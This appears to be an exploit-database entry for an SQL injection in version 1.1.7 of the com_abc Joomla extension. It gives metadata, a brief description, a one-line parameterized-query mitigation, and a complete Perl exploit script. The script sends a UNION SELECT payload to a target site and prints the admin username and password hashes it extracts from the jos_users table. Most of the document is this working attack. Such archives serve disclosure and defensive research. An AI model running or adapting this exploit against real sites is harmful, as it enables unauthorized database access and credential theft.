ABC Joomla Extension SQL Injection Exploit

vendor:

com_abc

by:

AntiSecurity

8,8

CVSS

HIGH

SQL Injection

CWE

Product Name: com_abc

Affected Version From: 1.1.7

Affected Version To: 1.1.7

Patch Exists: NO

Related CWE: N/A

CPE: a:airiny:com_abc

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: None

2010

ABC Joomla Extension SQL Injection Exploit

ABC Joomla Extension is vulnerable to SQL Injection. An attacker can exploit this vulnerability by sending a crafted HTTP request with malicious SQL query to the vulnerable application. This can allow the attacker to gain access to the admin account and extract sensitive information from the database.

Mitigation:

The application should use parameterized queries to prevent SQL injection attacks.

Source

Exploit-DB raw data:

#!/usr/bin/perl

#***********************************************************************#
#                                                                       #
# [o] ABC Joomla Extension SQL Injection Exploit                        #
#      Software : com_abc version 1.1.7                                 #
#      Vendor   : http://www.airiny.com/                                #
#      Author   : AntiSecurity [ NoGe Vrs-hCk OoN_BoY Paman zxvf s4va ] #
#      Contact  : public[at]antisecurity[dot]org                        #
#      Home     : http://antisecurity.org/                              #
#                                                                       #
# [o] Usage                                                             #
#      root@evilc0de:~# perl abc.pl www.target.com                      #
#                                                                       #
# [o] Greetz                                                            #
#      Angela Zhang stardustmemory aJe martfella pizzyroot Genex        #
#      H312Y yooogy mousekill }^-^{ noname matthews wishnusakti         #
#      skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke kaka11             #
#                                                                       #
# [o] April 27 2010 - GMT +07:00 Jakarta, Indonesia                     #
#                                                                       #
#***********************************************************************#

use HTTP::Request;
use LWP::UserAgent;

my $target = $ARGV[0];
my $file_vuln = '/index.php?option=com_abc&view=abc&letter=AS&sectionid=';
my $sql_query = '-null+union+select+1,group_concat(0x3a,username,0x3a,password,0x3a)+from+jos_users--';
print "\n[x]===============================================[x]\n";
print "[x]  ABC Joomla Extension SQL Injection Exploit   [x]\n";
print "[x]            [C]oded By AntiSecurity            [x]\n";
print "[x]===============================================[x]\n\n";

my $exploit = "http://".$target.$file_vuln.$sql_query;

my $request   = HTTP::Request->new(GET=>$exploit);
my $useragent = LWP::UserAgent->new();
$useragent->timeout(10);
my $response  = $useragent->request($request);
if ($response->is_success) {
my $res   = $response->content;
if ($res =~ m/:(.*):(.*):/g) {
my ($username,$password) = ($1,$2);
print "[+] $username:$password \n\n";
}
else { print "[-] Error, Fail to get admin login.\n\n"; }
}
else { print "[-] Error, ".$response->status_line."\n\n"; }